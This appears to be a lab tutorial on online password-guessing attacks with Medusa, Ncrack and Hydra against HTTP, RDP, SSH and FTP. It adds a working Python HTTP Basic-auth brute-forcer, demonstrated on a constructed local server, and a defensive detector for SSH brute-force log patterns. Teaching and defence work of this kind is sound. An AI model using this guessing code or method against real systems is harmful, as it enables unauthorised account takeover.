ONLINE PASSWORD ATTACKS WITH MEDUSA, NCRACK AND HYDRA
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFC3xlm_nV4uFs0yWVI4txcTABlaJO2gNgFxxVmVZnMb5hDOXSjsWjubwFXU_aT5m7dm4-ZHCGtsJdmqlgLz95Dadvt36FCqDZsHq9lPUWiLLAZPukTzUtotEJeaO91kw9i-mu6DXQPawi/s1600/screenshot.10.jpg)
1 - Introduction
- Online password attacks are password-guessing attempts against networked services that authenticate clients with a username and password.
- This includes services such as HTTP, SSH, VNC, FTP, SNMP, POP3, etc.
- To automate a password attack against a given networked service, the tool must be able to generate authentication requests in the specific protocol spoken by that service, and to tell an accepted login apart from a rejected one.
- Tools such as Medusa, Ncrack, Hydra and even Metasploit can be used for that purpose.
- Every guess is a real login attempt against the live service, so these attacks are slow compared with offline hash cracking, leave a trail in the target's logs and can trigger account lockouts.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivmeBkELQuYhLIVcj7O8H9UN3asVnfNARaYps7SDDw2_DHWOY8a2zi3IiFE7H40VR5O-b9t4JE1p4YYh_bzRFUGJByQYeW6rPNokpEl-iBlXur-jUC3xmsMrJc83hfwSDZm32QF1O7K5tD/s400/screenshot.7.jpg)
2 - Medusa for HTTP brute force attack
- Medusa is a speedy, massively parallel, modular command-line login brute-forcer for services that allow remote authentication.
- Medusa supports HTTP, FTP, CVS, AFP, IMAP, MS SQL, MySQL, NCP, NNTP, POP3, PostgreSQL, pcAnywhere, rlogin, SMB, rsh, SMTP, SNMP, SSH, SVN, VNC, vmauthd and Telnet.
- The host, the username and the password can each be given as a single value or as a file of values, so one run can cover many hosts, users and passwords.
- Throughput depends on network connectivity; against a local system, for instance, it can test about 2000 passwords per minute.
- Medusa can run attacks in parallel, for instance testing several email accounts simultaneously by supplying a username list together with the password list.
- Installation and further information here:
http://foofus.net/goons/jmk/tools/
http://foofus.net/goons/jmk/medusa/medusa.html
- In the next example Medusa is used to brute-force an .htaccess-protected web directory (HTTP Basic authentication).
- First, check that port 80 is open on the target:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS_i305hF0XzE6xruujEnOaDPGnmesaIX2ycJCNGk2bijwe5dH7TKEn4YPLeUbJAHPIBnstVrTG-ePbzqVkIZx2VkCP4Hesq2dKN2Iw8P0BYE4AbpRIW7A7h7ilIMLj7z4fTSyDJpatogW/s1600/screenshot.3.jpg)
- Launching Medusa against the target, the attack is successful (note that in Medusa -T is the number of hosts tested concurrently; the number of login attempts run in parallel against each host is set with -t):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVsA9kfAXDprJ9JnsbEABr8NtQ5mzX0BzWIcSDS0kNxuzjy-QGILZ7d6NMyOZ-hDjAtduzjuvu747UuK3zKrbxZDa1QLQEguEKCvb0pFmsaZxIXVH4E_xFOKMYIPfSCgcVEf63GCcySB6Q/s1600/screenshot.1.jpg)
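What "generating authentication requests for the specific protocol" means in practice, as an added example that is not code from this page or from the Medusa project: a minimal HTTP Basic authentication guesser in Python, sending the same Authorization header that Medusa's http module sends against an .htaccess-protected directory and reading the 401/200 verdict. The target server, the credentials admin:letmein and the wordlists are constructed for the example.

```python
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed target for this example: a tiny HTTP server that protects /admin/
# with Basic authentication, standing in for the .htaccess-protected directory.
# The credentials below are invented test data, not anything from the page.
VALID_USER = "admin"
VALID_PASS = "letmein"
PROTECTED_PATH = "/admin/"


class BasicAuthHandler(BaseHTTPRequestHandler):
    """Replies 401 + WWW-Authenticate until the right Authorization header arrives."""

    def log_message(self, fmt, *args):  # silence per-request logging
        pass

    def do_GET(self):
        if not self.path.startswith(PROTECTED_PATH):
            self.send_response(404)
            self.end_headers()
            return
        expected = "Basic " + base64.b64encode(
            f"{VALID_USER}:{VALID_PASS}".encode()).decode()
        if self.headers.get("Authorization") == expected:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"secret area\n")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="restricted"')
            self.end_headers()


def start_server():
    """Start the constructed target on an ephemeral loopback port."""
    srv = HTTPServer(("127.0.0.1", 0), BasicAuthHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def try_basic_auth(host, port, path, user, password):
    """One login attempt: the request a Basic-auth brute-forcer generates.
    Returns the HTTP status code (401 = rejected, 200 = accepted)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", path, headers={"Authorization": "Basic " + token})
        return conn.getresponse().status
    finally:
        conn.close()


def guess_basic_auth(host, port, path, users, passwords, stop_on_first=True):
    """Try every user/password pair; return the pairs the server accepted.
    Any status other than 401/200 is not an authentication verdict (wrong
    directory, server error), so stop instead of misreading it as a result."""
    found = []
    for user in users:
        for pw in passwords:
            status = try_basic_auth(host, port, path, user, pw)
            if status == 401:
                continue
            if status != 200:
                raise RuntimeError(f"unexpected status {status} for {path}; check the directory")
            found.append((user, pw))
            if stop_on_first:
                return found
    return found


if __name__ == "__main__":
    srv = start_server()
    port = srv.server_address[1]
    users = ["root", "admin"]                       # constructed wordlists
    passwords = ["password", "123456", "letmein"]
    print(guess_basic_auth("127.0.0.1", port, PROTECTED_PATH, users, passwords))
    srv.shutdown()
```

The loop above is exactly what Medusa parallelises across its login threads; the rest of the tool is wordlist handling and one such request generator per protocol module. The check for statuses other than 401/200 matters in practice: pointing the tool at a path that is not actually protected yields no 401 at all, and a naive brute-forcer would report every guess as a hit.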
3 - Ncrack for RDP brute force attack
- Ncrack is a high-speed network authentication cracking tool built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.
- Ncrack was designed using a modular approach, a command-line syntax similar to Nmap and a dynamic engine that can adapt its behaviour based on network feedback. It allows for rapid, yet reliable large-scale auditing of multiple hosts.
- Protocols supported by Ncrack include RDP, SSH, HTTP(S), SMB, POP3(S), VNC, FTP, SIP, Redis, PostgreSQL, MySQL, and Telnet.
- Ncrack is available for many different platforms, including Linux, *BSD, Windows and Mac OS X. There are already installers for Windows and Mac OS X and a universal source code tarball that can be compiled on every system.
- For download and further information:
https://nmap.org/ncrack/
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCDwhcaefSt7Mts1ChXjPvfQ_kxveEsAXqtLkY9iB37qWeGv45pVUwNus0yjXrQIlWxAuilhuKOSXwpRrdo50a2Z0nExzLEg4QHKMDrDgJNFO8OzqjkmMdS3JxfE1PMELai5LiU22hCG50/s1600/screenshot.6.jpg)
- The attack is successful:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO6Vq0YBUWmXBmTYO0I_HlV_eToRLLDVR4wue4gcVFIn7AjfW4Qscax8oOfjb6_1yrXvbTnge3P1Rty2RlMUMlLj30Vgi_8DDkIYL-e2dizge10k2rdVf5AicazcDXw2d49A0TG7GcZc0B/s1600/screenshot.5.jpg)
4 - Hydra for SSH brute force attack
- Hydra is a fast network logon password cracker.
- It runs on Windows, Linux, FreeBSD, Solaris and OS X and supports many network protocols, including Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
- Download Hydra here:
https://www.thc.org/thc-hydra/
- In the next example, SSH credentials are attacked with Hydra.
- Checking that the SSH service is listening on port 22 of the target:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdg-f74_AI_zmP_uFmYkpqOKIKjR9Fn9tVDoLkn9RYNck0tWiU_Zkv7hBXQWLfVLQYCeYTHt03bHGCAUHRNhzGw14AYiJEs0mP6A4kJQyl6i53k1fLM-N3E5Bxm_cj9qz37rDO2qR1AU5-/s1600/screenshot.4.jpg)
- The attack is successful:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiBQME85zc1dLko9iOBjlmoSKevyDqEmKUeB_zNQyn6zuVM5h3KidGKCI5hoJFDMlozzdrjOO6-Bxbz1jyblid48koo5FB42xy-fSCfn2m3bVVXT1o1mEuUnavEafX4kBruhTexpcEfQEU/s1600/screenshot.2.jpg)
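What the SSH attack above leaves behind on the target, as an added example that is not part of the original post: sshd writes one line per attempt to the auth log, and a short Python detector over those lines is enough to spot a guessing run and to see whether it succeeded. The log lines, the addresses 10.0.0.5 and 10.0.0.9 and the year are constructed for the example; the threshold and window are assumptions to tune.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log lines in syslog format (as written to /var/log/auth.log).
# 10.0.0.5 is the attacker: six failures in three seconds, then a success as root.
# 10.0.0.9 is a user who mistyped once and then logged in normally.
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 target sshd[1201]: Failed password for invalid user admin from 10.0.0.5 port 40001 ssh2
Mar  3 10:15:01 target sshd[1203]: Failed password for invalid user admin from 10.0.0.5 port 40002 ssh2
Mar  3 10:15:02 target sshd[1205]: Failed password for root from 10.0.0.5 port 40003 ssh2
Mar  3 10:15:02 target sshd[1207]: Failed password for root from 10.0.0.5 port 40004 ssh2
Mar  3 10:15:03 target sshd[1209]: Failed password for root from 10.0.0.5 port 40005 ssh2
Mar  3 10:15:03 target sshd[1211]: Failed password for root from 10.0.0.5 port 40006 ssh2
Mar  3 10:15:04 target sshd[1213]: Accepted password for root from 10.0.0.5 port 40007 ssh2
Mar  3 10:20:44 target sshd[1300]: Failed password for alice from 10.0.0.9 port 51000 ssh2
Mar  3 10:20:50 target sshd[1300]: Accepted password for alice from 10.0.0.9 port 51000 ssh2
"""

LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s\S+\ssshd\[\d+\]:\s"
    r"(?P<verdict>Failed|Accepted)\s\S+\sfor\s(?:invalid user\s)?"
    r"(?P<user>\S+)\sfrom\s(?P<src>[\d.]+)\sport\s\d+"
)


def parse_line(line, year=2023):
    """Parse one sshd line into a dict, or return None for lines of no interest.
    Syslog timestamps carry no year, so the caller supplies it (assumed 2023 here)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {' '.join(m['ts'].split())}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "verdict": m["verdict"], "user": m["user"], "src": m["src"]}


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Flag a source IP once it produces `threshold` failed logins inside
    `window_seconds`, and record whether a login was accepted from it afterwards
    (the sign that the guessing attack actually worked)."""
    by_src = defaultdict(list)
    for event in (parse_line(l) for l in lines):
        if event:
            by_src[event["src"]].append(event)

    alerts = {}
    for src, events in by_src.items():
        events.sort(key=lambda e: e["ts"])
        fail_ts = [e["ts"] for e in events if e["verdict"] == "Failed"]
        burst_at = None
        # sliding window: failures i-threshold+1 .. i all fall inside the window
        for i in range(threshold - 1, len(fail_ts)):
            if (fail_ts[i] - fail_ts[i - threshold + 1]).total_seconds() <= window_seconds:
                burst_at = fail_ts[i]
                break
        if burst_at is None:
            continue
        accepted = [e for e in events if e["verdict"] == "Accepted" and e["ts"] >= burst_at]
        alerts[src] = {
            "failures": len(fail_ts),
            "users": sorted({e["user"] for e in events if e["verdict"] == "Failed"}),
            "burst_at": burst_at.isoformat(),
            "success_as": accepted[0]["user"] if accepted else None,
        }
    return alerts


if __name__ == "__main__":
    for src, alert in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()).items():
        print(src, alert)
```

Hydra's default of 16 parallel tasks produces exactly this pattern: many "Failed password" lines from one source within seconds, often for "invalid user" names, followed by "Accepted password" once the list hits. fail2ban and sshd's MaxAuthTries do the same counting on the host itself, and key-only authentication (PasswordAuthentication no in sshd_config) removes the password-guessing surface entirely.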
5 - Hydra for FTP brute force attack
- This attack is similar to the previous one; the only difference is that the attacked service is FTP, listening on port 21:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_TDVHeEcSFBkITi67geVH4fuzaYPmIlkd4Jkr5is3KRz9NQ2Zz1EKdWOPmRtfQVRfGCidHTJm8BCfqyNgJTRTu5NuZg4G7uI0KUY2zAlmcscT69NrPKsFhY0bTRuNF3UkaJKMa_QqiezC/s1600/screenshot.1.jpg)
- The attack is successful:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisSUVGS-oIKzmRFbTWIDxyk8ks8s1ooxt7M2UKzEmQwq7oilcJtvi5b9kCq6BmeNv5Hn1kp16rq5JFSn6uX_dWzMgUY7cKrJXMqBjBCXFOOaXZF3rNsmUCEyglbGswQ4yN-V2MVR1KrCHl/s1600/screenshot.2.jpg)